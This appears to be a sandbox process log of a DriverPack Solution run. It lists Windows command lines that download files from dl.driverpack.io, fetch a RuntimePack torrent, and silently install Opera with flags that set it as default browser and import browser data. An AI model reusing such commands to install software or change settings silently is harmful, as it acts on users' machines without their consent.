"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-vpn-4.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_51477.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_51477.txt""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "205733076317883083431571877381939256378-1380015921-1717263501-666031876-980764393"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-vpn-5.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_16880.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_16880.txt""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "2038899042-584233720-1980021357745075974-785572292-764582427-812197301-896817802"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-vpn-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_68590.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-vpn-4.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_51477.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-vpn-5.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_16880.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-vpn-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_4901.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-vpn-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_86566.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-vpn-6.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_40097.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_40097.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/STORIES-vpn-6.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_40097.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/REBOOT-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_46340.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_46340.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/REBOOT-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_46340.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/FINAL-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_48472.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_48472.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/FINAL-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_35955.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_35955.txt""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1723195589-17255162601470629226-362378560-118210241888735059-596673508-511954192"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/FINAL-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_48472.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/FINAL-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_35955.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\aria2c.exe" "http://dl.driverpack.io/soft/RuntimePack.exe.torrent" --dir="C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS" --quiet --continue --min-split-size=1M --follow-torrent=true --check-integrity --seed-time=0 --bt-stop-timeout=120 || echo Done & call echo Done %^errorLevel% > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\run_command_50830.txt""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "990410063-1221372747-1568791232-1976925605863069264701874251537569119-497711594"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\aria2c.exe

"tools\aria2c.exe" "http://dl.driverpack.io/soft/RuntimePack.exe.torrent" --dir="C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS" --quiet --continue --min-split-size=1M --follow-torrent=true --check-integrity --seed-time=0 --bt-stop-timeout=120

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaBlink64_win7.exe" -install -silent -launchopera=1 -setdefaultbrowser=1 || echo Done & call echo Done %^errorLevel% > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\installing_74987.txt""

C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaBlink64_win7.exe

"C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaBlink64_win7.exe" -install -silent -launchopera=1 -setdefaultbrowser=1

C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaBlink64_win7.exe

C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaBlink64_win7.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=64.0.3417.73 --initial-client-data=0xf4,0xfc,0x100,0xf8,0x104,0x7fef52a8058,0x7fef52a8068,0x7fef52a8078

C:\Users\Admin\AppData\Local\Temp\Opera Installer Temp\OperaBlink64_win7.exe

"C:\Users\Admin\AppData\Local\Temp\Opera Installer Temp\OperaBlink64_win7.exe" --version

C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaBlink64_win7.exe

"C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaBlink64_win7.exe" --backend --install --import-browser-data=1 --enable-stats=1 --enable-installer-stats=1 --launchopera=1 --installfolder="C:\Program Files (x86)\Opera" --profile-folder --language=en --setdefaultbrowser=1 --pintotaskbar=1 --pin-additional-shortcuts=1 --server-tracking-data=server_tracking_data --initial-pid=4916 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\Opera Installer Temp\opera_package_20240503165201" --session-guid=030bc381-007c-41d4-9b2d-f49690f660b0 --silent --wait-for-package --initial-proc-handle=6803000000000000

C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaBlink64_win7.exe

C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaBlink64_win7.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=64.0.3417.73 --initial-client-data=0xf8,0x108,0x10c,0x104,0x110,0x7fef4858058,0x7fef4858068,0x7fef4858078

C:\Program Files (x86)\Opera\64.0.3417.73\installer.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\installer.exe" --backend --initial-pid=4916 --install --import-browser-data=1 --enable-stats=1 --enable-installer-stats=1 --launchopera=1 --installfolder="C:\Program Files (x86)\Opera" --profile-folder --language=en --setdefaultbrowser=1 --pintotaskbar=1 --pin-additional-shortcuts=1 --server-tracking-data=server_tracking_data --package-dir="C:\Users\Admin\AppData\Local\Temp\Opera Installer Temp\opera_package_202405031652011" --session-guid=030bc381-007c-41d4-9b2d-f49690f660b0 --silent --install-subfolder=64.0.3417.73

C:\Program Files (x86)\Opera\64.0.3417.73\installer.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=64.0.3417.73 --initial-client-data=0xf4,0xfc,0x100,0xf8,0x104,0x7fef4118058,0x7fef4118068,0x7fef4118078

C:\Program Files (x86)\Opera\launcher.exe

"C:\Program Files (x86)\Opera\launcher.exe" --new-tab

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --new-tab --ran-launcher

C:\Program Files (x86)\Opera\64.0.3417.73\opera_crashreporter.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera_crashreporter.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=64.0.3417.73 --initial-client-data=0x160,0x164,0x168,0x15c,0x16c,0x7feeeb95428,0x7feeeb95438,0x7feeeb95448

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=gpu-process --field-trial-handle=1028,15228908155744434926,9078484734282085166,131072 --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --gpu-preferences=KAAAAAAAAADgAAAgAAAAAAAAYAAAAAAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=9935525436330478670 --mojo-platform-channel-handle=1040 --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=utility --field-trial-handle=1028,15228908155744434926,9078484734282085166,131072 --lang=en-US --service-sandbox-type=network --enable-quic --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --service-request-channel-token=8941723151897261531 --mojo-platform-channel-handle=1224 /prefetch:8

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --new-tab --ran-launcher --flag-switches-begin --flag-switches-end --enable-quic --lowered-browser

C:\Program Files (x86)\Opera\64.0.3417.73\opera_crashreporter.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera_crashreporter.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=64.0.3417.73 --initial-client-data=0x160,0x164,0x168,0x15c,0x16c,0x7feeeb95428,0x7feeeb95438,0x7feeeb95448

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=gpu-process --field-trial-handle=1064,1920831034183440388,13834543338824630887,131072 --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --gpu-preferences=KAAAAAAAAADgAAAgAAAAAAAAYAAAAAAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=17925462152955152105 --mojo-platform-channel-handle=1076 --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=utility --field-trial-handle=1064,1920831034183440388,13834543338824630887,131072 --lang=en-US --service-sandbox-type=network --enable-quic --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --service-request-channel-token=8352696979603817250 --mojo-platform-channel-handle=1204 /prefetch:8

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=renderer --field-trial-handle=1064,1920831034183440388,13834543338824630887,131072 --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 OPR/64.0.3417.73 (Edition Campaign 34)" --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=109343904690499047 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1908 /prefetch:1

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=renderer --field-trial-handle=1064,1920831034183440388,13834543338824630887,131072 --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 OPR/64.0.3417.73 (Edition Campaign 34)" --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=2942542560908696638 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1916 /prefetch:1

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=renderer --field-trial-handle=1064,1920831034183440388,13834543338824630887,131072 --lang=en-US --extension-process --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 OPR/64.0.3417.73 (Edition Campaign 34)" --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=15416950059122545703 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2224 /prefetch:1

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=renderer --field-trial-handle=1064,1920831034183440388,13834543338824630887,131072 --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 OPR/64.0.3417.73 (Edition Campaign 34)" --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=13434582810936531436 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2232 /prefetch:1

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=renderer --field-trial-handle=1064,1920831034183440388,13834543338824630887,131072 --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 OPR/64.0.3417.73 (Edition Campaign 34)" --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=3895878742471882859 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2332 /prefetch:1

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=renderer --field-trial-handle=1064,1920831034183440388,13834543338824630887,131072 --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 OPR/64.0.3417.73 (Edition Campaign 34)" --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=10198639949760333215 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2408 /prefetch:1

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=renderer --field-trial-handle=1064,1920831034183440388,13834543338824630887,131072 --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 OPR/64.0.3417.73 (Edition Campaign 34)" --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=7622510160438238007 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2500 /prefetch:1

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=renderer --field-trial-handle=1064,1920831034183440388,13834543338824630887,131072 --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 OPR/64.0.3417.73 (Edition Campaign 34)" --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=7873155694134205444 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2516 /prefetch:1

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=renderer --field-trial-handle=1064,1920831034183440388,13834543338824630887,131072 --lang=en-US --extension-process --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 OPR/64.0.3417.73 (Edition Campaign 34)" --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=17930687269212249933 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2620 /prefetch:1

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=renderer --field-trial-handle=1064,1920831034183440388,13834543338824630887,131072 --lang=en-US --extension-process --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 OPR/64.0.3417.73 (Edition Campaign 34)" --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=8589750413958975746 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2696 /prefetch:1

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=renderer --field-trial-handle=1064,1920831034183440388,13834543338824630887,131072 --lang=en-US --extension-process --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 OPR/64.0.3417.73 (Edition Campaign 34)" --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=1047012040664010251 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2704 /prefetch:1

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=utility --field-trial-handle=1064,1920831034183440388,13834543338824630887,131072 --lang=en-US --no-sandbox --enable-quic --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --service-request-channel-token=1007748355965491077 --mojo-platform-channel-handle=2864 /prefetch:8

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=utility --field-trial-handle=1064,1920831034183440388,13834543338824630887,131072 --lang=en-US --service-sandbox-type=utility --enable-quic --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --service-request-channel-token=17083203736710871213 --mojo-platform-channel-handle=3524 --ignored=" --type=renderer " /prefetch:8

C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe" --host=https://autoupdate.geo.opera.com/ --pipeid --version=64.0.3417.73 --edition="Campaign 34" --lang=en-US --producttype --requesttype=start --operadir="C:\Program Files (x86)\Opera\64.0.3417.73" --installdir="C:\Program Files (x86)\Opera" --user-data-dir="C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable" --installationdatadir="C:\Program Files (x86)\Opera" --firstrunver=36.0.2130.80 --consent-info=eyJzdGFydHBhZ2VfbmV3c19jb25zZW50X2dpdmVuIjpmYWxzZSwic3RhdGlzdGljc19jb2xsZWN0aW9uX2VuYWJsZWQiOnRydWUsInVzZXJfZXhwZXJpZW5jZV9tZXRyaWNzX3JlcG9ydGluZ19lbmFibGVkIjp0cnVlfQ== --firstrunts=1714755097

C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=64.0.3417.73 --initial-client-data=0xbc,0xc0,0xc4,0xb8,0xc8,0x13ff80650,0x13ff80660,0x13ff80670

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=utility --field-trial-handle=1064,1920831034183440388,13834543338824630887,131072 --lang=en-US --service-sandbox-type=utility --enable-quic --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --service-request-channel-token=7730865058435971137 --mojo-platform-channel-handle=2088 --ignored=" --type=renderer " /prefetch:8

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=gpu-process --field-trial-handle=1064,1920831034183440388,13834543338824630887,131072 --disable-gpu-sandbox --use-gl=disabled --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --gpu-preferences=KAAAAAAAAADoAAAgAAAAAAAAYAAAAAAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=1483460255471828034 --mojo-platform-channel-handle=2068 /prefetch:2

C:\Windows\SysWOW64\cmd.exe

